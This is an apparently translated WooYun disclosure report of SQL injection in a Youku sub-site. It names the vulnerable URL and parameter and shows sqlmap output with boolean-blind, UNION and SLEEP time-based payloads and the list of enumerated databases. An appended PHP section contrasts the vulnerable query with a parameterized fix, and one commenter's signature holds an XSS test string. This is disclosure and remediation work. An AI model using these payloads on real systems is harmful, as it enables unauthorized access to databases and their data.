
Vulnerability summary

Defect ID: wooyun-2014-083661

Title: SQL injection on a Youku sub-site

Vendor: Youku

Author: U神

Submitted: 2014-11-17 22:29

Fix time: 2015-01-01 22:30

Public disclosure: 2015-01-01 22:30

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-11-17: Details sent to the vendor, awaiting vendor handling
2014-11-18: Vendor confirmed; details visible to the vendor only
2014-11-28: Details disclosed to core white hats and domain experts
2014-12-08: Details disclosed to regular white hats
2014-12-18: Details disclosed to intern white hats
2015-01-01: Details disclosed to the public

Brief description:

Detailed description:

http://hvsop.youku.com/list.php?music=1




sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: music
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: music=1' AND 7821=7821 AND 'IbzW'='IbzW
Type: UNION query
Title: MySQL UNION query (NULL) - 15 columns
Payload: music=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178686571,0x496c4e6172726d6c4b7a,0x7166706a71),NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: music=1' AND SLEEP(5) AND 'fKmP'='fKmP
---
[22:00:42] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[22:00:42] [INFO] fetching database names
available databases [3]:
[*] db_events
[*] information_schema
[*] test
[22:00:42] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\hvsop.youku.com'

Proof:

Database: db_events
[250 tables]

Remediation:

I only enumerated the tables and did not go any deeper; please fix it, thanks~ I haven't had any rank for days, could I get a little?
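The report leaves the fix at "please fix it", so here is an added example (not Youku's code; the real query behind list.php is unknown, and the hvsop_videos table and column names are assumed) showing the string-interpolation pattern that produces the injection above beside the hardened form, where `music` is validated as an integer and bound as a parameter, so the quote-based payloads sqlmap used never reach the SQL text.

```php
<?php
// Added example, not the original list.php. Table/column names are assumed.

// Vulnerable pattern: the music parameter is concatenated straight into the SQL
// string, so a value such as  1' AND 7821=7821 AND 'IbzW'='IbzW  rewrites the
// WHERE clause instead of being compared as data.
function listVideosVulnerable(mysqli $db, $music)
{
    $sql = "SELECT id, title FROM hvsop_videos WHERE music = '$music'";
    return $db->query($sql);
}

// Hardened form: enforce the expected type first, then bind the value as a
// parameter of a server-side prepared statement.
function listVideosSafe(PDO $db, $musicRaw)
{
    // music is a numeric flag in the URL; reject anything that is not a
    // non-negative integer instead of trying to "escape" it.
    $music = filter_var($musicRaw, FILTER_VALIDATE_INT,
                        array('options' => array('min_range' => 0)));
    if ($music === false) {
        http_response_code(400);
        return array();
    }

    $stmt = $db->prepare('SELECT id, title FROM hvsop_videos WHERE music = :music');
    $stmt->bindValue(':music', $music, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Connection settings: credentials are placeholders. Disabling emulated
// prepares makes MySQL itself separate the query text from the bound values.
$pdo = new PDO('mysql:host=localhost;dbname=db_events;charset=utf8mb4',
               'app_user_placeholder', 'password_placeholder', array(
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
));

$rows = listVideosSafe($pdo, isset($_GET['music']) ? $_GET['music'] : '');
header('Content-Type: application/json');
echo json_encode($rows);
```

The database account the site uses should also be limited to the tables it needs in db_events; an application account that can list other schemas, as the sqlmap output above shows this one could, turns a single injected parameter into a server-wide data leak.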

Copyright notice: please credit the source when reposting, U神@乌云


Vulnerability response

Vendor response:

Severity: Medium

Rank: 10

Confirmed: 2014-11-18 08:46

Vendor reply:

Thanks for the heads-up, we will fix it right away.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-11-18 02:05 | ki11y0u ( regular white hat | Rank:104 vulns:23 | Studying hard, hoping someone will carry me~~~~~~~~~~~~~~~~~~~~~~...)

    Front row~~~

  2. 2014-11-18 08:52 | backtrack丶yao ( regular white hat | Rank:290 vulns:107 | "><img src=x onerror=alert(666666);> <im...)

    This account got doxxed, by: U神

  3. 2014-11-19 09:56 | Aepl│恋爱 ( intern white hat | Rank:45 vulns:15 | Forzen恋爱 - don't want to be your Guest, only want to be your adm...)

    The white hat you follow, U神, posted the vulnerability "Command execution on an important 宜信 sub-site (internal network penetration possible)" 2014-11-18
    The white hat you follow, U神, posted the vulnerability "SQL injection on a Youku sub-site" 2014-11-17
    The white hat you follow, U神, posted the vulnerability "Command execution on a 东方航空 sub-site" 2014-11-17